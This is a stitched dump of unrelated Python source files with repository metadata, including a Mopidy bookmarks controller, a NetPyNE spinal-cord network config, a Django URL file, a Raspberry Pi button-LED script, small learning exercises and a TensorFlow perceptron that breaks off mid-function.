print(f"""Hello, {user["first"]} {user["last"]} ({user["account_num"]})
1 Check balance
2 Withdraw funds
3 Deposit funds
4 Sign out
""")
def main_prompt():
return input("Your choice:") | [
"[email protected]"
]
| |
19991d7f0056982ff6ebada00d7bad44c64016e4 | c9ea085c1d74d4f989a72f7e5d1f59433ef31dd9 | /mopidy_bookmarks/controllers/bookmarks.py | 335828023e4b919a80d6b1cacc26e8ca9d26ac2a | [
"Apache-2.0"
]
| permissive | sapristi/mopidy-bookmarks | 08c615ae094846e9c89a4d9ede5a204599ca1f2b | 9babcc94b5099a86063e87830ce1026056c77747 | refs/heads/master | 2022-11-26T14:01:48.861863 | 2020-07-31T15:06:58 | 2020-07-31T15:06:58 | 276,175,116 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,724 | py | import logging
import pykka
import time
from peewee import (
Model,
SqliteDatabase,
IntegerField,
DoesNotExist,
)
from mopidy import models
from .generic import LTextField, JsonField, LimitError
logger = logging.getLogger(__name__)
class BookmarksController(pykka.ThreadingActor):
def __init__(self, dbfile, max_bookmarks, max_length):
super().__init__()
self.db = SqliteDatabase(None)
class Bookmark(Model):
name = LTextField(primary_key=True, max_length=100)
current_track = IntegerField(null=True)
current_time = IntegerField(null=True)
tracks = JsonField(max_length=max_length, null=True)
last_modified = IntegerField(null=True)
class Meta:
database = self.db
def to_mopidy_model(self):
track_models = [models.Track(**track) for track in self.tracks]
return models.Playlist(
uri=f"bookmark:{self.name}",
name=self.name,
tracks=list(track_models),
last_modified=self.last_modified,
)
self.Bookmark = Bookmark
self.max_bookmarks = max_bookmarks
self.dbfile = dbfile
def on_start(self):
self.db.init(self.dbfile)
self.db.create_tables([self.Bookmark])
def on_stop(self):
self.db.close()
def save(self, name, tracks):
bookmark, created = self.Bookmark.get_or_create(name=name)
if (
created
and self.max_bookmarks
and self.Bookmark.select().count() > self.max_bookmarks
):
raise LimitError(
f"Maximum number of bookmarks ({self.max_bookmarks}) reached."
)
bookmark.tracks = tracks
bookmark.current_track = None
bookmark.current_time = None
bookmark.last_modified = int(time.time())
bookmark.save()
return bookmark
def update(self, name, current_track, current_time):
bookmark = self.Bookmark[name]
bookmark.current_track = current_track
bookmark.current_time = current_time
bookmark.save()
def delete(self, name):
try:
bookmark = self.Bookmark[name]
bookmark.delete_instance()
return True
except DoesNotExist:
return False
def get(self, name):
try:
return self.Bookmark[name]
except DoesNotExist:
return None
def get_items(self, name):
bm = self.Bookmark[name]
return bm.tracks
def as_list(self):
return [bm.name for bm in self.Bookmark.select()]
| [
"[email protected]"
]
| |
ec6fcf93cc3d0262a6b7b598ec122b19591057aa | f217883abc9daffecdafec5794068a5ca6adb905 | /MathOperationsP5.py | 00acbad3dd8e167bf09f55a7b3f12b6cf98a3bff | []
| no_license | DamianVega/P1.HelloWorld | 693592cd4175118afcf34790958d3751f156ce21 | 9a636ac31e54481e6fcefe5e3ab7c2d0799d8003 | refs/heads/master | 2020-04-05T01:22:45.045323 | 2019-05-13T18:47:50 | 2019-05-13T18:47:50 | 156,433,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | a = 25
b = 10
c = 7
# Adding
print("Display the sum of:",a,"+",c,"=",a+c)
# Subtracting
print("Display the difference of:",a,"-",c,"=",a-c)
# Multiplying
print("Display the multiplication of:",a,"*",c,"=",a*c)
# Division
print("Display the division of:",a,"/",c,"=",a/c)
# Integer Division
print("Display the integer division of:",a,"//",c,"=",a//c)
# The remainder of Integer Division, %
print("Display the remainder of integer division of:",a,"%",c,"=",a%c)
print(a, "Modulus",c,"=",a%c)
# Power of a Number
print("2 to the 5th power =",2**5) | [
"[email protected]"
]
| |
1a62fead2b8972b791603ecd96b75643fdc06101 | 2da14d080bf2e54b13b8b1b23aface9b755f94f0 | /zhichen/items.py | 559c21abeb923bdac3a8d22ccfe79ecef1bbb05c | []
| no_license | efdssdf/zhichen | 82bf6fe38d59b8ebc4f90e7c84709a3e6fee59d1 | 0a76d507af85b1efd7676aeafac6d2cba48b5e5f | refs/heads/master | 2020-04-08T07:36:23.988586 | 2018-11-26T09:40:28 | 2018-11-26T09:40:28 | 159,144,769 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class ZhichenItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
pass
| [
"[email protected]"
]
| |
34e6d9bd427d80013aeb40dfba6f4734f2d186e4 | e6bc1f55371786dad70313eb468a3ccf6000edaf | /Datasets/py-if-else/Correct/076.py | 2c07f238adcfd70b429c52cda3509dc1a5eb15ba | []
| no_license | prateksha/Source-Code-Similarity-Measurement | 9da92e3b22c372ed6ea54d8b6ab2c5921e8c41c0 | fb371b837917794d260a219a1ca09c46a5b15962 | refs/heads/master | 2023-01-04T07:49:25.138827 | 2020-10-25T14:43:57 | 2020-10-25T14:43:57 | 285,744,963 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | #!/bin/python3
import sys
N = int(input().strip())
if(N%2==0) :
if (N<5 or N>20):
print('Not Weird')
else :
print ("Weird")
else :
print ("Weird") | [
"[email protected]"
]
| |
990724591460f6a3454e06b1a3df500f07f90241 | 58ee1dc37b57e0b4f06cf383c6a9e0654f490150 | /python-tflearn-git/lilac.py | 5214cab05f245eed7f14892fa3df205c85351b16 | []
| no_license | MikeyBaldinger/arch4edu | f3af87ef3a8d4cd78fde7e0ef75658c17dbe8c06 | c1775bf7fe0ffc87f3c8b4109fb1e8acde12a430 | refs/heads/master | 2022-12-23T16:40:55.513537 | 2020-09-28T21:00:59 | 2020-09-28T21:00:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | #!/usr/bin/env python3
from lilaclib import *
maintainers = [{'github': 'petronny', 'email': 'Jingbei Li <[email protected]>'}]
update_on = [{'aur': None}, {'github': 'tflearn/tflearn'}, {'alias': 'python'}]
build_prefix = 'extra-x86_64'
pre_build = aur_pre_build
post_build = aur_post_build
if __name__ == '__main__':
single_main(build_prefix)
| [
"[email protected]"
]
| |
204330cf331d9714e480ff6aed9841c350a88aa2 | d9effdca7fcaf3ec7d5568d69476c181e7aa05cc | /00_scripts/06_04_bulkMoist.py | 5cc2100b448f587e4d337addf635652d5a0d1c8a | []
| no_license | Potopoles/MScTh | cac1013dea0d9935efa1bd5b6a30a7f339f3c9ac | 7fdd5b769fe9416c056f8b8003b8466547d9f71c | refs/heads/master | 2021-07-10T14:16:47.636015 | 2020-06-25T10:43:48 | 2020-06-25T10:43:48 | 151,584,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,504 | py | def plotVertProf(var_vP, varNCO, ax, meta):
zvals = varNCO.dims['altitude'].vals
zvals = np.expand_dims(zvals, 0)
zvals = np.repeat(zvals,len(subSpaceInds['diurnal']),axis=0)
PLOT = ax.plot(np.transpose(var_vP), np.transpose(zvals))
ax.axvline(x=0, color=(0.5,0.5,0.5), linestyle='-', linewidth=1)
ax.legend(PLOT, subSpaceInds['diurnal'])
ax.set_xlim([meta['min'], meta['max']])
ax.grid()
import os
os.chdir('00_scripts/')
i_resolutions = 3 # 1 = 4.4, 2 = 4.4 + 2.2, 3 = ...
i_plot = 2 # 0 = no plot, 1 = show plot, 2 = save plot
import matplotlib
if i_plot == 2:
matplotlib.use('Agg')
import matplotlib.pyplot as plt
inpPath = '../02_fields/subDomDiur'
plotOutDir = '../00_plots/06_bulk'
plotName = 'QVT_TOT.png'
import numpy as np
import ncClasses.ncObject as ncObject
profiles = {}
modes = ['', 'f']
if i_resolutions == 1:
ress = ['4.4']
elif i_resolutions == 2:
ress = ['4.4', '2.2']
elif i_resolutions == 3:
ress = ['4.4','2.2','1.1']
elif i_resolutions == 4:
ress = ['2.2']
elif i_resolutions == 5:
ress = ['1.1']
for res in ress:
print(res)
for mode in modes:
#mode = ''
print(mode)
subSpaceInds = {}
subSpaceInds['rlon'] = (50,100)
subSpaceInds['rlat'] = (20,57)
#subSpaceInds['rlon'] = (50,60)
#subSpaceInds['rlat'] = (30,40)
subSpaceInds['altitude'] = list(range(1,41))
subSpaceInds['diurnal'] = [0,3,6,9,12,15,18,21]
#subSpaceInds['diurnal'] = [3,9,15,21]
#subSpaceInds['diurnal'] = [21]
fact = 1
if res == '2.2':
fact = 2
elif res == '1.1':
fact = 4
if 'rlon' in subSpaceInds:
subSpaceInds['rlon'] = [x * fact for x in subSpaceInds['rlon']]
subSpaceInds['rlon'] = list(range(subSpaceInds['rlon'][0], subSpaceInds['rlon'][1]+1))
if 'rlat' in subSpaceInds:
subSpaceInds['rlat'] = [x * fact for x in subSpaceInds['rlat']]
subSpaceInds['rlat'] = list(range(subSpaceInds['rlat'][0], subSpaceInds['rlat'][1]+1))
from functions_06 import LoadField
LF = LoadField(inpPath, res, mode, subSpaceInds)
(RHO,rho) = LF.loadField('zRHO.nc', 'RHO')
#(W,w) = LF.loadField('zW.nc', 'W')
#(T,t) = LF.loadField('zT.nc', 'T')
(QVT_TOT,qvt_tot) = LF.loadField('zAQVT_TOT.nc', 'AQVT_TOT')
#(P,p) = LF.loadField('zP.nc', 'P')
from functions_06 import vertProf
# CALCULATE VERTICAL PROFILE
qvt_tot_vP = vertProf(qvt_tot*3600*1000, rho)
profiles[str(res+mode)] = qvt_tot_vP
pltMeta = {}
pltMeta['max'] = -np.Inf
pltMeta['min'] = np.Inf
for key,vals in profiles.items():
if np.nanmax(vals) > pltMeta['max']:
pltMeta['max'] = np.nanmax(vals)
if np.nanmin(vals) < pltMeta['min']:
pltMeta['min'] = np.nanmin(vals)
fig, axes = plt.subplots(ncols=3, nrows=2, figsize=(16,8))
plotVertProf(profiles['4.4f'], RHO, axes[0,0], pltMeta)
plotVertProf(profiles['4.4'], RHO, axes[1,0], pltMeta)
if '2.2' in ress:
plotVertProf(profiles['2.2f'], RHO, axes[0,1], pltMeta)
plotVertProf(profiles['2.2'], RHO, axes[1,1], pltMeta)
if '1.1' in ress:
plotVertProf(profiles['1.1f'], RHO, axes[0,2], pltMeta)
plotVertProf(profiles['1.1'], RHO, axes[1,2], pltMeta)
if i_plot == 1:
plt.show()
elif i_plot == 2:
plotPath = plotOutDir + '/' + plotName
plt.savefig(plotPath, format='png', bbox_inches='tight')
| [
"[email protected]"
]
| |
54073a0a96169761ca6e309c1f572aa135b71df0 | 682319f56c17e949bab0d6e418838d33977dd760 | /RP/search_element.py | 6bddc659f268253cf4d1a9296c7704a8a0a4f81b | []
| no_license | DilipBDabahde/PythonExample | 8eb70773a783b1f4b6cf6d7fbd2dc1302af8aa1b | 669762a8d9ee81ce79416d74a4b6af1e2fb63865 | refs/heads/master | 2020-08-23T01:05:44.788080 | 2020-07-25T21:59:52 | 2020-07-25T21:59:52 | 216,511,985 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,431 | py | '''
.Write a program which accept N numbers from user and store it into List. Accept one another number from user and
return frequency of that number from List.
input: Num of elements: 12
input Elements: 5 8 6 8 5 9 3 7 2 21 1 5
Element to search = 5
output: Freq of search element is: 3
'''
def search_Element(arr, iNo):
if len(arr) < 0:
return -1;
icnt = 0; # icnt is counter variable which is used to increament it's value by One when we get our Element
for i in range(0, len(arr)):
if arr[i] == iNo:
icnt = icnt + 1;
return icnt;
def main():
arr_list = list(); # arr_list is object of list class , this object is used to add elements in it
size = input("Enter list size: ");
size = int(size); # type conversion of size variable str to int
print("Enter elements for list");
for i in range(0, size):
no = input("Enter element: ");
no = int(no); # type conversion
arr_list.append(no); # appending element to list class object
#now our list is created using loop iteration
print("Created list is: ",arr_list);
search_var = input("Enter number to search its freq:");
search_var = int(search_var);
result =search_Element(arr_list, search_var);
if result > 0 :
print("FReq of given variable in list is: ",result);
elif result == 0:
print("There is no element in list ");
else:
print("Invalid input");
if __name__ == "__main__":
main();
| [
"[email protected]"
]
| |
1fcc808e5c396da1120452e56d1413f1fbbc350a | 66735869ad5468454f96f4dd5fd4dc2df29ec1c3 | /netParams.py | d7b85a0a5c5171186ab9852d8aae2035cdffa262 | []
| no_license | joewgraham/spinalcord | 6b4f98c92105fc8fe5c3184450123f1e85ff7834 | 0e8956280a80a355372ffef0a01e839d1789e2a4 | refs/heads/master | 2022-11-24T13:27:45.482318 | 2020-07-23T03:36:19 | 2020-07-23T03:36:19 | 281,727,379 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,825 | py | from netpyne import specs, sim
try:
from __main__ import cfg
except:
from cfg import cfg
netParams = specs.NetParams()
netParams.propVelocity = 100.0 # propagation velocity (um/ms)
netParams.probLengthConst = 100 # length constant for conn probability (um)
netParams.defaultThreshold = cfg.defaultThreshold # voltage threshold to count as a spike (mV)
netParams.popParams['LF1'] = {
"cellModel": "",
"cellType": "mn_s",
"numCells": 100,
"xRange": [-200, -300],
"yRange": [0, 10000],
"zRange": [0, 100],
"pop": "LF",
"xnormRange": [-2.0, -3.0],
"ynormRange": [0.0, 100.0],
"znormRange": [0.0, 1.0],
}
netParams.popParams['LF2'] = {
"cellModel": "",
"cellType": "mn_s",
"numCells": 100,
"xRange": [-200, -300],
"yRange": [5000, 15000],
"zRange": [0, 100],
"pop": "LF",
"xnormRange": [-2.0, -3.0],
"ynormRange": [0.0, 100.0],
"znormRange": [0.0, 1.0],
}
netParams.popParams['LF3'] = {
"cellModel": "",
"cellType": "mn_s",
"numCells": 100,
"xRange": [-200, -300],
"yRange": [10000, 20000],
"zRange": [0, 100],
"pop": "LF",
"xnormRange": [-2.0, -3.0],
"ynormRange": [0.0, 100.0],
"znormRange": [0.0, 1.0],
}
netParams.cellParams['mn_s'] = {
"conds": {},
"secs": {
"soma": {
"geom": {
"diam": 5,
"L": 5,
"Ra": 150.0,
"cm": 1,
},
"mechs": {
"pas": {
"g": cfg.pas_g,
"e": cfg.pas_e,
},
"namot": {
"gbar": cfg.namot_gbar, # Default: 0.02
},
"kamot": {
"gbar": cfg.kamot_gbar, # Default: 0.02
},
"kdrmot": {
"gbar": cfg.kdrmot_gbar, # Default: 0.02
},
},
},
},
}
netParams.synMechParams['exc'] = {
"mod": "Exp2Syn",
"tau1": 0.1,
"tau2": 1,
"e": 0
}
netParams.connParams['mn->mn'] = {
"preConds": {"cellType": ["mn_s"]},
"postConds": {"cellType": ["mn_s"]},
"synsPerConn": 1,
"synMech": "exc",
"probability": str(cfg.distScale) + "* probLengthConst/(probLengthConst + dist_3D *" + str(cfg.distScale) + ") *" + str(cfg.connScale),
"weight": cfg.connWeight,
"delay": "dist_3D/10",
}
cfg.connScale = 1.0
cfg.distScale = 10.0
netParams.stimSourceParams['IClamp0'] = {
"type": "IClamp",
"del": cfg.IClamp0_del,
"dur": cfg.IClamp0_dur,
"amp": cfg.IClamp0_amp,
}
netParams.stimTargetParams['IClamp0->target'] = {
"source": "IClamp0",
"conds": cfg.IClamp0_conds,
"sec": cfg.IClamp0_sec,
"loc": cfg.IClamp0_loc,
}
| [
"[email protected]"
]
| |
f8d452fb3157f7facf9a23c27cb5b31e1d5c8b91 | b96b7ba35f4bac232f195adcd50a63433d88880a | /tracking.py | dadf9bf1fe598c50351e4ea8903010bcb508ca93 | []
| no_license | meexwaal/MarkOffProcessor | 72c54178b56b0dc22ebf6491de5488cb7dc16a1b | 7c2f88d8328c104626056efa202851248dc17eaa | refs/heads/master | 2021-09-04T17:56:19.169067 | 2018-01-20T20:59:48 | 2018-01-20T20:59:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18 | py | opencv/tracking.py | [
"[email protected]"
]
| |
b80e6678bdec542511a639a79632f094d5382c60 | a0e94248c539b087342ccab59c4edef99e3c8f80 | /main.py | 8e6c2bc875f89f44d1f588841bf44309051404ff | []
| no_license | Pawanpathak4/spychat | 6389d40cd03ad6c9771f74ae17f086a4cd5729bc | bbf95dba45923f329bb3eb91f11948304831aaf2 | refs/heads/master | 2020-03-09T09:33:12.074066 | 2018-04-09T05:11:24 | 2018-04-09T05:11:24 | 128,715,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,716 | py | ############spychat5555########
def entry():
name = raw_input("What's your spy name??")
if len(name) > 0:
print("Yay, the name is good.")
salutation = raw_input("What would be your spy salutation, Mr. ,Mrs or Ms.")
full_name = salutation + " " + name
print("Alright " + full_name + ", I would like to know little more about you....")
age = int(raw_input("what's your age?"))
if 20 < age < 50:
print("Alright,")
rating = float(raw_input("whats ur Spy rating??"))
if 2.5 <= rating < 3.5:
print(" U can always do better")
elif 3.5 <= rating < 4.5:
print("Yup, you are one of good ones")
elif rating >= 4.5:
print("Ooo, thts an ace")
else:
print("We can always use somebody to help in the office.")
ol = bool(raw_input("Are u online???"))
if ol == False:
print("Authentication complete, welcome " + full_name + " with age " + repr(age) + " and rating of " + repr(rating) + " Proud to have u you on board")
else:
print(" ")
else:
print("Sorry you are not of the correct age to be a spy")
exit()
else:
print("This name is not valid please try with a better name")
def spy_chat():
show_menu = True
current_status_message = None
while show_menu:
print("What do you want to do?")
menu_choices = "1. Add a status update \n2. Add a friend \n3. Exit the Application\nInput :- "
menuchoice = raw_input(menu_choices)
if menuchoice == "1":
current_status_message = add_status(current_status_message)
elif menuchoice == "2":
no = add_friend()# no of friends returned
print("No of friends : %d" % no)
elif menuchoice== '3':
print("QUITTING....")
show_menu = False
else:
print("invalid input")
pass
def add_status(current_status_message):
if current_status_message is not None:
print("Your current status is : %s" % current_status_message)
else:
print("You don't have any status right now")
default =raw_input( "Do you want to select from the previous status??(Y/N)")
if default.upper() == 'N':
new_status_message = raw_input("Which status you want to set ??")
if len(new_status_message) > 0:
updated_status_message = new_status_message# updates status
STATUS_MESSAGES.append(updated_status_message) # Entered in the list
else:
print("Please enter a valid status...")#invalid status
updated_status_message = current_status_message # assign previous status
elif default.upper() == 'Y':
item_position = 1
for message in STATUS_MESSAGES:
print("%d . %s" % (item_position, message))
item_position = item_position + 1
menu_selection = int(raw_input("What is your desired status?"))
if len(STATUS_MESSAGES) >= menu_selection:
updated_status_message = STATUS_MESSAGES[menu_selection - 1]# set desired status
else:
print("invalid input...")
updated_status_message = current_status_message # assign previous status
else:
print("invalid input")
pass
return updated_status_message
def add_friend():
new_name = raw_input("Whats your friend spy name?")
new_salutation =raw_input("what would be the salutation, Mr. or Mrs??")
new_name = new_salutation + " " + new_name
new_age = int(raw_input("what is friends age?"))
new_rating = float(raw_input("what's your friend spy rating??"))
if len(new_name)>0 and 12 < new_age < 50: ### add friend
Friend_name.append(new_name)
Friend_age.append(new_age)
Friend_rating.append(new_rating)
Friend_status.append(True)
else: ##invalid details
print("Sorry we can't add your friend's details please try again")
return len(Friend_name)
user = raw_input("Do you want to continue with the default user ?(Y/N)")
new_user = 0
if user.upper() == 'Y':
from spy_details import name
from spy_details import salutation
from spy_details import age
from spy_details import rating
print('Welcome,%s %s with %d years of age and %.1f rating. Welcome to spychat.... ' %
(salutation, name, age, rating))
else:
new_user = 1
entry()
STATUS_MESSAGES =['Mandir wahin banaenge...', 'Jai shree RAM']
Friend_name = []
Friend_age = []
Friend_rating = []
Friend_status = []
| [
"[email protected]"
]
| |
2f043528a38c9588efa20f5f3d70aeed5298c733 | 6ff5e37147419b5ed5ee43a6654bf2bc8d6f5779 | /printTree.py | ebc7c00a98b0ea95dfa91e3bcf56708872eafcf8 | []
| no_license | ashageorgesj/LeetCode | 982fcdf5265ce98c02a27a7b55ff4273c4875dcd | afb8c8fbfa3f3a08d70c4fa12ab82bcb601bbb2d | refs/heads/master | 2021-05-21T04:19:45.314378 | 2021-02-05T07:13:58 | 2021-02-05T07:13:58 | 252,539,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,332 | py | from typing import List
class Node:
def __init__(self,val="",children=[]):
self.val = val
self.children = []
class Solution:
def findHierarchy(array:List[List[str]]):
# Find top level parent:
top = set()
children = []
mydict = {}
#print(array)
for member in array:
#print(member)
children.append(member[1])
if member[0] not in mydict:
mydict[member[0]] = []
mydict[member[0]].append(member[1])
for member in array:
if member[0] not in children:
top.add(member[0])
print(mydict)
def buildTree(parent,childNames):
nonlocal mydict
if not parent or len(childNames) == 0:
return
for children in childNames:
print(children)
newNode = Node(children)
if children in mydict:
buildTree(newNode,mydict[children])
parent.children.append(newNode)
top = list(top)
root = Node(top[0])
buildTree(root,mydict[top[0]])
def print_tree(root,space):
if root:
print(" "*space + root.val)
if len(root.children) > 0:
for child in root.children:
print_tree(child,space*2)
print_tree(root,1)
#Solution.findHierarchy([["Computers","Apple"],["Apple","iMac"],["Computers","Acer"],["Acer","Aspire"],["Computers","HP"],["HP","Pavilion"]]) | [
"[email protected]"
]
| |
fdfc672d12f9c86098112c591150ba65cb65eadc | f9e379b6183376699a270cf90a1472d3d20da3e0 | /travel/apps/cities/urls.py | 9312df2242babfe28b56b7428ea77380a5f15522 | []
| no_license | tuxubaev17/Travel | d60627a8d111a30bbdc98027c278d8b616630131 | a885b3b5ebddf0f20e2f68d6279561a91f74028b | refs/heads/master | 2023-04-29T07:30:46.586047 | 2020-01-19T08:22:33 | 2020-01-19T08:22:33 | 226,667,476 | 0 | 0 | null | 2023-04-21T20:43:45 | 2019-12-08T12:54:48 | Python | UTF-8 | Python | false | false | 480 | py | from django.urls import path
from .views import (home, CityDetailView, CityCreateView,
CityUpdateView, CityDeleteView)
app_name = "city"
urlpatterns = [
path('', home, name='home'),
path('detail/<int:pk>/', CityDetailView.as_view(), name='detail'),
path('add/', CityCreateView.as_view(), name='add'),
path('update/<int:pk>/', CityUpdateView.as_view(), name='update'),
path('delete/<int:pk>/', CityDeleteView.as_view(), name='delete'),
]
| [
"[email protected]"
]
| |
3628f604b1aba3e9e2c220706799292b5ac0944b | d79a6dc4bef743e2cd503a8c05b64a00476f6a32 | /02_01/begin/readInData.py | e4589d9d5658e2d3778d4a91d5efa18e13dc163d | []
| no_license | thuhuong262hd/scripting_for_tester | 2e5aa8cad9e97e4557d69d70de3406545e8839da | 1b5fed9468e5518f2cba9391f7166547d93524b3 | refs/heads/master | 2023-03-22T01:19:32.130118 | 2021-03-11T06:59:56 | 2021-03-11T06:59:56 | 342,200,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 823 | py | import csv
#final desired format
# - Charts [["Test Name",<diff from avg>]]
# - spreadsheet [["Test Name",<current run time>]]
timing_data = []
with open('TestTimingData.csv') as csv_file:
file_reader = csv.reader(csv_file)
for row in file_reader:
timing_data.append(row)
column_chart_data = [["Test Name", "Diff from Avg"]]
table_data = [["Test Name", "Run Time (s)"]]
#[1:] start from 1 to end
for row in timing_data[1:]:
test_name = row[0]
if not row[1] or not row[2]:
continue
current_run_time = float(row[1])
avg_run_time = float(row[2])
diff_from_avg = avg_run_time - current_run_time
column_chart_data.append([test_name,diff_from_avg])
table_data.append([test_name,current_run_time])
print (column_chart_data)
print (table_data) | [
"[email protected]"
]
| |
e24d433767d920ff680b986ff07f6b0f6fe496bf | 61863803f0e010020f0a7ff0210e86809b94e965 | /day4/raspberrypi-codes/button-led/button-interfacing.py | f80e1efdafda5babfe46df5d4ca91093836b7735 | []
| no_license | maddydevgits/bitspilani-hyd-iot-bootcamp | 1aa23d4584bddec188996da60ab58675c30b1f3a | 44c64caaf247360252f6d9d9ccf868b1bc5a218e | refs/heads/main | 2023-06-23T23:41:00.534483 | 2021-07-30T16:24:10 | 2021-07-30T16:24:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 323 | py | # sudo python3 rpi-button-led.py
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
GPIO.setup(2, GPIO.IN) # BUTTON (OC - 1, CC - 0)
GPIO.setup(21, GPIO.OUT) # LED (0 - ON, 1 - OFF)
while True: # Infinite Loop
if GPIO.input(2): # reading the data from GPIO2
GPIO.output(21,1) # OFF
else:
GPIO.output(21,0) # ON
| [
"[email protected]"
]
| |
850985fddff858e55bfd488b48ba7aff47e39da6 | fbf73800e27f66960f677a284c2771e66708973b | /subreview_lib/classicreviewdecisionpage.py | dfbc360e28ba50b5a16d59e1c83ece7bce6d2c65 | [
"MIT"
]
| permissive | allankellynet/mimas | 94140a341693d4729b3cdf5ea94ef2f7e550aad6 | 10025d43bba9e84f502a266760786842e7158a05 | refs/heads/master | 2022-05-30T21:35:06.083902 | 2020-02-27T14:04:27 | 2020-02-27T14:04:27 | 235,146,506 | 0 | 0 | MIT | 2022-05-25T04:56:13 | 2020-01-20T16:30:39 | Python | UTF-8 | Python | false | false | 3,568 | py | #-----------------------------------------------------
# Mimas: conference submission and review system
# (c) Allan Kelly 2016-2020 http://www.allankelly.net
# Licensed under MIT License, see LICENSE file
# -----------------------------------------------------
# System imports
# Google imports
import logging
from google.appengine.ext import ndb
# Local imports
import roundreviews
import basehandler
from submission_lib import submissionrecord
class ClassicReviewDecisionPage(basehandler.BaseHandler):
def make_page(self, crrt_conf):
review_round = int(self.request.get("round"))
tracks = crrt_conf.mapped_track_obects()
crrt_track = self.request.get("track", default_value=tracks.keys()[0])
submissions = self.sorted_submissions(crrt_conf, crrt_track, review_round)
template_values = {
'crrt_conf': crrt_conf,
"track_objects": tracks,
"crrt_track": crrt_track,
"submissions": submissions,
"submissions_len": len(submissions),
"decisions": submissionrecord.get_decision_summary(crrt_conf.key, crrt_track, review_round),
"decision_maker": crrt_conf.user_rights().has_decision_right_for_round(
self.get_crrt_user().email(), review_round),
"review_round": review_round,
"track_slots": crrt_conf.mapped_track_obects()[crrt_track].slots,
}
self.write_page('subreview_lib/classicreviewdecisionpage.html', template_values)
def sorted_submissions(self, crrt_conf, crrt_track, review_round):
submissions = submissionrecord.retrieve_conference_submissions_by_track_and_round(
crrt_conf.key, crrt_track, review_round)
if self.request.params.has_key("mean"):
sorted = submissionrecord.sort_submissions_by_mean_high_to_low(submissions, review_round)
else:
sorted = submissionrecord.sort_submissions_by_total_high_to_low(submissions, review_round)
return sorted
def get(self):
if not (self.session.has_key("crrt_conference")):
logging.debug("Conference key session variable missing")
return
crrt_conf = ndb.Key(urlsafe=self.session["crrt_conference"]).get()
self.make_page(crrt_conf)
def submit_decisions(self, review_round):
if not (self.session.has_key("crrt_conference")):
logging.debug("Conference key session variable missing")
return
roundreviews.submit_decisions(
ndb.Key(urlsafe=self.session["crrt_conference"]),
self.request.get("tracklist"),
review_round,
self.request)
def decline_no_decisions(self, review_round):
self.submit_decisions(review_round)
roundreviews.mass_track_change(
ndb.Key(urlsafe=self.session["crrt_conference"]),
self.request.get("tracklist"),
review_round,
"No decision",
"Decline")
def post(self):
review_round = int(self.request.get("review_round"))
if self.request.get("SubmitDecision"):
self.submit_decisions(review_round)
if self.request.get("DeclineNoDecisions"):
self.decline_no_decisions(review_round)
self.redirect("/classic_review_decisions?track=" +
self.request.get("tracklist") +
"&round=" + str(review_round))
| [
"[email protected]"
]
| |
ba7772ef5a0bdda86060a572f050496c9ed99e11 | bc6704ee95819dd8f0547b69c6edf3a4300a7667 | /ML/DeepModel.py | c4603653b531386bc72a7f9f34dd7ca8d68a3123 | []
| no_license | zhangzhenyu13/CreditPredict | 09e25cbcc6ec6742861f781fc09eb49cff02a4db | 26dba961f1c576c4a0158a4ef0bf01d30f79d351 | refs/heads/master | 2021-07-07T22:18:49.043396 | 2017-10-04T13:54:31 | 2017-10-04T13:54:31 | 105,357,395 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,152 | py | #coding: utf-8
import tensorflow as tf
import time
import xml.dom.minidom as xmlparser
from LoadData.SelectRelativeAttrs import *
from LoadData.StrEncoder import *
from LoadData.fillStrategy import *
#load net structure from file
def readnetStructure(inDim,outDim):
print("netWorks Structure")
w = {}
b = {}
# READ PARAMETERS FROM ANNStructure.XML
dom = xmlparser.parse("..\data\ANNStructure.xml")
ANN = dom.documentElement
prevNum=inDim
nextNum=0
layer=''
i=0
while True:
try:
layer='L'+str(i)
nextNum = eval(ANN.getElementsByTagName(layer)[0].childNodes[0].nodeValue)
w[i]=[prevNum,nextNum]
b[i]=[nextNum]
prevNum=nextNum
print(layer, ":", w[i], b[i])
i = i + 1
except Exception as e:
w[i]=[prevNum,outDim]
b[i]=[outDim]
print(layer, ":", w[i], b[i])
break
return (w,b)
#deep leanring scheme
def multi_perceptron(trainData,validData,testData):
#extract validdata
xt,yt=validData.getRunTuple2(validData.dataSet)
#def Learning parameters
learnRate = 0.1
batchSize = 100
iterationNum = 1000
inDim=len(xt[0])
outDim=1
#define the Graph
x=tf.placeholder(tf.float32,[None,inDim],name='X_in')
y=tf.placeholder(tf.float32,[None,2],name='Y_out')
#drop out probability
keep_prob=tf.placeholder(tf.float32)
#def hidden layers
w,b=readnetStructure(inDim,outDim)#defNetWork(inDim,outDim,hiddenLayer)
W={}
B={}
H={}
for i in range(len(b)):
W[i]=tf.Variable(tf.truncated_normal(shape=w[i],stddev=0.1))
B[i]= tf.Variable(tf.truncated_normal(shape=b[i],stddev=0.1))
H[0]=tf.nn.relu(tf.matmul((x),W[0])+B[0])
for i in range(1,len(b)-1):
#print(i)
H[i]=tf.nn.elu(tf.matmul(H[i-1],W[i])+B[i])
model=None
if len(b)>=2:
model=tf.nn.relu(tf.matmul(H[len(b)-2],W[len(b)-1])+B[len(b)-1])
else:
model=H[0]
model=tf.nn.dropout(model,keep_prob)
#define error and train goal
#errorLayer=tf.Variable(tf.constant([model,1/(model+0.001)]),trainable=False)
# balance the importance of true postive and false positive
#errorLayer=tf.matmul(y,model)#care both tp and fp
error=tf.slice(y,[0,0],[-1,1])*model+tf.slice(y,[0,1],[-1,1])/(model+1e-8)
loss=tf.reduce_sum(tf.square(error))
train_step=tf.train.AdamOptimizer(learning_rate=learnRate).minimize(loss)
# correctness counter
